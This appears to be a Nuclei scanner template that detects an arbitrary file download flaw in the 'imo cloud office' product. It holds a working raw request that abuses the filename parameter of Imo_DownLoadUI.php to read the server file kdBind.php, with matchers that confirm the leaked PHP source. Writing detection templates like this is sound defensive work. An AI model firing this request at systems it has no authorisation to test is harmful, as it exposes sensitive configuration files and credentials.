id: imo-file-download

info:
  name: IMO - Arbitrary File Download
  author: ritikchaddha
  severity: high
  description: |
    The imo cloud office can read system sensitive files because the filename parameter of the /file/Placard/upload/Imo_DownLoadUI.php page is not strictly filtered.
  reference:
    - https://forum.butian.net/article/214
  metadata:
    max-request: 2
  tags: imo,file-download

http:
  - raw:
      - |
        GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?php'
          - '$bindInfo = array'
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=/home/www"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201b86d77189abbf7753dc11efc184773bb801748d35690eb5e944ec0e0e02d4a8022100fb647fda7a6ea221c69333cb18511c175900c4e25c3e6aca23e81437c1e5959f:922c64590222798bb761d5b6d8e72950